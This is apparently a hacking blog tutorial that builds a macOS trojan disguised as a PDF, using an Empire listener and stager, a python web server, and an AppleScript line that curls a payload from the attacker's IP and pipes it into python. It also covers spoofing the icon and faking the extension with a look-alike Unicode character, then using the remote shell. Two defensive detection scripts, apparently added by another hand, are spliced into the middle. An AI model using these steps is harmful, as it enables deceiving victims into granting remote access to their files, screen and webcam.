A quick preview of what’s to come:
- Install the listening tool – we will be using Empire to generate an applescript payload and listen for the signal to start the session.
- Create the listener – using Empire, we will input an IP address and port as parameters, as well as the type of listener.
- Create the stager – using Empire, we will create the stager, the module that generates the custom applescript. Once we input the hacker’s IP address, listening port, and payload to use, Empire will generate an applescript that we can export as an application that will start up a session.
- Save the trojan to a file – after we generate the script, we will need to transfer it to our mac. This can be done easily by emailing the file to yourself (don’t worry, you won’t hack yourself if you send it as a text file).
- Create a python web server – we want to create a web server that our applescript can use to download files. When the victim opens our fake pdf, we want to download and display the image that they think they will see. After all, a pdf that opens nothing is very suspicious.
- Install GIMP, a photo editor – we are going to disguise our trojan file as a pdf, and so we need a picture for the file to display. GIMP allows us to do just this.
- Export and edit the pdf – in order to make the image more convincing, we will edit the image we will use in GIMP. We will also convert it to an icns file, allowing us to use the image as an icon for a file.
- Insert the script – using the mac’s custom script editor, we will be able to create an application file (mac equivalent of an exe file) that will run our trojan.
- Disguise the file – an application file will trigger alarm bells in our victim’s head. By changing the icon image and using a couple of tricks to disguise the file extension, we can make the application file look just like a normal pdf.
- Poke around in the shell – once the victim clicks on the “pdf,” we will gain access to the victim’s computer, including the file system, webcam, and certain systems.
Part 1: Creating the listener and web server
Step 1: Install the listening tool
For those of you who have read other articles by us, you should be very familiar with Metasploit and how it can allow you to remotely access a trojan that you planted on some unsuspecting person’s computer. It also comes pre-installed on Kali, making it extra convenient. Instead of Metasploit, we’re going to use a different listening tool: Empire.
Empire is a framework similar to Metasploit in that it allows you to snoop around inside a network, oftentimes undetected. Empire is more specialized, though: it is used mainly for generating Windows payloads, but it can be used against Macs as well.
If you already have Empire, skip to step 2
To install Empire, simply type
Into the terminal. This tells Kali to go to a GitHub repository and clone the code inside it (Git also comes pre-installed on all Kali USBs sold by the website listed above). After a few seconds, Empire will be installed.
Before we can use Empire, we need to set it up and install everything necessary.
Move into the Empire folder and then into the setup folder using cd, then install Empire by typing in
Eventually, you will be prompted to enter a password. I set it to “toor” due to tradition.
To run Empire, type in
To get back to the previous directory, then type in
To start it up.
Step 1.5: Fixing any errors
It is very possible that when you try to run Empire, it will give you an import error like this one:
If this happens, don’t panic. Most of the time, you can fix this by doing a simple
sudo apt-get install python-[missing module name]
pip install [missing module name]
Eventually, you will install everything necessary and get to this screen.
Step 2: Creating the listener
If you haven’t already, type in
While in the Empire directory to start the Empire program. Once in, type in
To tell Empire that we want to set up a listener. From there, we can type in
To see all the commands available to us
We can type in
To use an http listener, which will wait until it receives a signal over http and then start up a shell on the target computer that we can poke around in.
We can type in
To see the options set for this listener.
It is very important for the port to be set to 80 and the host to be set to 0.0.0.0. Port 80 is the port that is used for http traffic, and a host of 0.0.0.0 will allow the listener to get traffic from any IP address.
We can type
set Host 0.0.0.0
To set the host to 0.0.0.0. Similarly, we can type
set Port 80
To set the listening port to 80 if it isn’t already set there. We will then type
Again to see the changes.
We are done with the setup. Type in
To start up the listener.
If we type in
We see that our http listener is active.
Step 3: Create the stager
A stager is similar to a payload. When the exploit is executed on the victim’s computer, it links the payload back to the Empire session, allowing us to maneuver throughout the victim’s system.
And then press the tab key twice to list all available stagers
In this tutorial, we will be using the applescript stager, as we will be hacking macOS.
If we type in
We can see the information regarding this stager. We see that there is no listener given.
In order to set the listener to http, we simply type
set Listener http
And then type
To see the changes.
To create the stager.
We see that a bash command is generated. We will copy this into a new file. This block of code is our trojan. We will copy this code and place it in the fake pdf.
Step 4: Save the trojan
Open up a new terminal window and type in
To create a new directory that holds all the files that will be important to this hack.
To enter that directory. We will create a file that contains the trojan code from the applescript stager.
To create the file
Right click and paste the trojan code into the file. Then type in ctrl-x and press ‘y’ to save the file.
To check that we did everything right, we can view the trojan code by typing in
If you followed all of the instructions, it should look like this picture below.
Step 5: Start the python web server
This web server allows anyone to download our trojan, but our intended target is the person who downloads the fake pdf. To start up the web server, open a new terminal window, make sure you are in the trojan_files directory, and type in
python3 -m http.server 8080 &
If we open up a browser window and type in our IP address and the port we used with the format [IP address]:[Port], we can see the file.
Part 2: Creating the pdf
We will be creating a real pdf for this exploit. This pdf will have a macro enabled so that it downloads our trojan every time the pdf is opened. It will connect to our python web server and download the trojan file that we have saved.
Step 1: Find the image and install GIMP
To create the pdf, search up the image that you’d like to send your victim and save it in your trojan_files directory.
Next, we want to install GIMP, which is a powerful photo editing tool. This will allow us to create our pdf. Simply type
sudo apt-get install gimp
to install it.
Next, we want to open up our image in GIMP. To do so, we type
Step 2: Export the picture and edit the size
In GIMP, we want to export the picture as a pdf, which can be done by clicking “file”, then “export as.” We can then rename the file and choose the type of file to export it to from the menu below. In this case, we want to export it to a pdf.
Apple icons are always perfect squares, so you may have to resize the image’s width or height so they are equal. To do this, simply go to Image and click on Canvas Size. We can now edit the size of the image. Make sure the “Fill with” option has “Transparency” selected.
Next, we want to scale the image. Click on “Image”, and then click on “Scale Image.” We want to scale the image to 256 x 256 pixels.
Finally, we want to export the jpg image as a png. This will allow us to easily convert the image to an icns file, the format Apple uses for icons. This lends more credibility to our fake pdf. If you don’t want to export the image as a png for whatever reason, you can use cloudconvert instead: convert the jpg file to a png file, and then convert the png to an icns file.
Go to https://cloudconvert.com/ to convert the image.
After it converts, download the image and move it from your downloads directory to your trojan_files directory using
cd ../Downloads
mv image_copy.icns ../trojan_files/
cd ../trojan_files/
Once you are done, you should see the image copy in the trojan_files folder.
Step 3: Insert the shell script and edit the pdf
Now, we are going to switch over to using a mac so we can create applescripts to embed in our pdf.
In the “utilities” folder listed under “Applications,” we see the script editor program. This will allow us to create custom applescripts. We will use this to download our trojan from our python web server.
Open up the script editor, and type in
do shell script "s=[Attacker_IP]:[Web_server_port]; curl -s $s/[pdf_file] | open -f -a Preview.app & curl -s $s/[Name_of_Trojan_File] | python -"
The attacker IP and port are the IP address of your computer (the attacking computer) and the port that the python web server is on. Type in the same values you used to access the python web server after you created it.
We are going to save this script as an “Application” file (mac equivalent of a .exe file). Click “file”, then export.
I recommend saving it to the desktop so we can easily work with the applescript. Our goal is to make it look identical to the real pdf.
In order to change the display image of the trojan file, right click on the trojan and click “get info.” You will then be able to drag the icns file that we made and put that as the image.
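From the defender’s side, the behaviour the script above produces (an AppleScript application spawning a shell that pipes curl output straight into an interpreter) is a recognisable process pattern. The following is an added example, not code from the original post: a small triage routine run over constructed process-start events. The parent name “applet” for an exported Script Editor application is an assumption, and the IP address and file names are placeholders.

```python
import re

# Constructed sample process-start events, in the shape an EDR or macOS
# endpoint log might emit: parent image name, child image, command line.
# The IP and file names are placeholders, not values from the original page.
SAMPLE_EVENTS = [
    {"parent": "applet", "image": "/bin/sh",
     "cmdline": "sh -c s=203.0.113.5:8080; curl -s $s/picture.pdf | open -f -a Preview.app "
                "& curl -s $s/trojan.txt | python -"},
    {"parent": "Terminal", "image": "/bin/zsh",
     "cmdline": "zsh -c curl -sO https://example.com/tool.tgz"},
    {"parent": "applet", "image": "/bin/sh", "cmdline": "sh -c say hello"},
    {"parent": "Terminal", "image": "/bin/bash",
     "cmdline": "bash -c curl -s https://example.com/install.sh | bash"},
]

# Assumption: an AppleScript exported from Script Editor as an Application
# runs under the executable name "applet"; "osascript" covers scripts run directly.
SCRIPT_PARENTS = {"applet", "osascript"}

# curl output piped straight into an interpreter that reads its program from stdin.
PIPE_TO_INTERPRETER = re.compile(
    r"\bcurl\b[^|]*\|\s*(?:python3?|perl|ruby|sh|bash|zsh|osascript)\b"
)


def score_event(event):
    """Return (severity, reason) for one process event, or None when benign."""
    if not PIPE_TO_INTERPRETER.search(event["cmdline"]):
        return None
    if event["parent"] in SCRIPT_PARENTS:
        return ("high", "AppleScript applet spawned a shell that pipes curl into an interpreter")
    return ("medium", "shell pipes curl output into an interpreter")


def triage(events):
    """Return [(cmdline, severity, reason)] for every event that matched."""
    hits = []
    for event in events:
        verdict = score_event(event)
        if verdict:
            hits.append((event["cmdline"], *verdict))
    return hits


if __name__ == "__main__":
    for cmdline, severity, reason in triage(SAMPLE_EVENTS):
        print(f"[{severity}] {reason}: {cmdline}")
```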
Step 4: Make the trojan appear as innocent as possible
The next thing we want to do is add a .pdf extension to the end of the file. However, when we try to rename it with a .pdf at the end, the mac will add the .app extension at the end.
The best way to mitigate this is to use a unicode character that looks like a p, d, or f, but actually isn’t. I recommend using unicode character U+217E, the small Roman numeral five hundred, which is written as a lowercase d. It looks almost identical to the letter d and I guarantee that no one will notice any difference.
The last thing that we might need to do is add a few lines to the plist document in the trojan. Sometimes, two windows will appear on the bottom dock when you open up the trojan pdf. That looks suspicious, as a normal pdf will only open one window when opened. However, we can fix this by adding these lines to the plist document.
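The disguise in Step 4 relies on two things a scanner can check: an .app bundle whose name carries a document extension, and look-alike characters such as U+217E standing in for ASCII letters. The following is an added example, not code from the original post: it folds compatibility characters with NFKC (which maps U+217E back to a plain d) plus a small hand-written table of Cyrillic look-alikes, then flags .app names that fold to a document extension. The folder list in the main block and the confusables table are assumptions.

```python
import os
import unicodedata

# Document extensions a disguised bundle is likely to imitate.
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt")

# Small, deliberately incomplete table of Cyrillic letters that look like
# Latin ones; NFKC does not fold these, so they are mapped by hand.
CONFUSABLES = {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c"}


def fold(text: str) -> str:
    """Fold look-alike characters to plain ASCII where a mapping exists.

    NFKC handles compatibility characters such as U+217E (small Roman
    numeral five hundred), which is the one the trick above relies on."""
    text = "".join(CONFUSABLES.get(ch, ch) for ch in text)
    return unicodedata.normalize("NFKC", text).casefold()


def classify_bundle_name(name: str):
    """Return a reason if an .app name masquerades as a document, else None."""
    if not name.casefold().endswith(".app"):
        return None
    stem = name[:-4]  # strip ".app", which Finder hides for applications
    folded = fold(stem)
    if not folded.endswith(DOC_EXTENSIONS):
        return None
    if folded != stem.casefold():
        odd = sorted({f"U+{ord(ch):04X}" for ch in stem if ord(ch) > 127})
        return f"homoglyph double extension: {stem!r} folds to {folded!r} ({', '.join(odd)})"
    return f"double extension: {stem!r}"


def scan_names(names):
    """Map each suspicious name to its reason; benign names are omitted."""
    hits = {}
    for name in names:
        reason = classify_bundle_name(name)
        if reason:
            hits[name] = reason
    return hits


if __name__ == "__main__":
    # Assumed scan locations: the usual landing spots for a mailed file.
    for folder in ("~/Desktop", "~/Downloads"):
        path = os.path.expanduser(folder)
        if os.path.isdir(path):
            for name, reason in scan_names(os.listdir(path)).items():
                print(f"{os.path.join(path, name)}: {reason}")
```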
Step 5: Poke around in your new shell
After the victim opens up the pdf with the trojan, we will see that Empire will respond with a new session.
From here, we can open up a new terminal and start Empire again. We will see that there are active agents.
We can type “agents” to navigate to the agents menu. From there, we can list our agents by typing
and we can interact with our agents by typing
If we type in
We can see the commands that are available to us, including the beloved ability to take a screenshot, as well as more advanced things like running a python script or downloading files.
Hopefully you now have a good understanding of how easy it can be to hack into a target system and cause a bit of mischief. If you want to try this out yourself, you can buy a live Kali Linux usb with installation instructions right here.